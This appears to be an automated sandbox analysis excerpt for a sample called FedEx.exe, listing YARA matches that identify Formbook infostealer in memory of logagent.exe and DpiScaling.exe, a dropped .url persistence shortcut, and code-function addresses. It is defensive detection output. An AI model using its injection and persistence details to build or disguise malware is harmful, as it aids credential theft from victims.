          Source: 00000008.00000000.479097118.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.479097118.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000000.582561192.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000000.582561192.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.695229674.0000000000E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.695229674.0000000000E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: FedEx.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: 20.0.logagent.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.0.logagent.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.logagent.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.logagent.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.0.logagent.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.0.logagent.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.0.DpiScaling.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.0.DpiScaling.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000000.600971102.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000000.600971102.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.663406978.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.663406978.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.622514268.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.622514268.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000000.601348197.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000000.601348197.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.696412101.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.696412101.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.639113956.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.639113956.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000000.601926446.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000000.601926446.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.627979202.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.627979202.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.658059430.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.658059430.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.478775786.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.478775786.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.479688839.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.479688839.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.658204539.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.658204539.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001D.00000002.640834589.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001D.00000002.640834589.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000000.583342582.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000000.583342582.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.601178673.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.601178673.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000000.582254970.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000000.582254970.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.639730390.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.639730390.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.550265684.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.550265684.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.622677419.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.622677419.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000000.582967305.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000000.582967305.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000000.600603050.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000000.600603050.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.479381669.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.479381669.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.696533789.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.696533789.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.479097118.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.479097118.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000000.582561192.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000000.582561192.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.695229674.0000000000E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.695229674.0000000000E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\Libraries\nebusvR.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: C:\Users\Public\Libraries\nebusvR.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BF9008_2_051BF900
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05282D078_2_05282D07
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B0D208_2_051B0D20
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051D41208_2_051D4120
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05281D558_2_05281D55
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E25818_2_051E2581
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051CD5E08_2_051CD5E0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C841F8_2_051C841F
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052710028_2_05271002
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052820A88_2_052820A8
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051CB0908_2_051CB090
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E20A08_2_051E20A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05282B288_2_05282B28
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EEBB08_2_051EEBB0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05281FF18_2_05281FF1
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0527DBD28_2_0527DBD2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051D6E308_2_051D6E30
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052822AE8_2_052822AE
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05282EF78_2_05282EF7
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF449620_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4841F20_2_04B4841F
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BFD46620_2_04BFD466
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C025DD20_2_04C025DD
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6258120_2_04B62581
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF2D8220_2_04BF2D82
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4D5E020_2_04B4D5E0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B30D2020_2_04B30D20
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C01D5520_2_04C01D55
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C02D0720_2_04C02D07
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C02EF720_2_04C02EF7
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B56E3020_2_04B56E30
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BFD61620_2_04BFD616
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C0DFCE20_2_04C0DFCE
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C01FF120_2_04C01FF1
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B620A020_2_04B620A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4B09020_2_04B4B090
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C028EC20_2_04C028EC
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C020A820_2_04C020A8
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5A83020_2_04B5A830
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF100220_2_04BF1002
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C0E82420_2_04C0E824
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5412020_2_04B54120
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B3F90020_2_04B3F900
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4AEF20_2_04BF4AEF
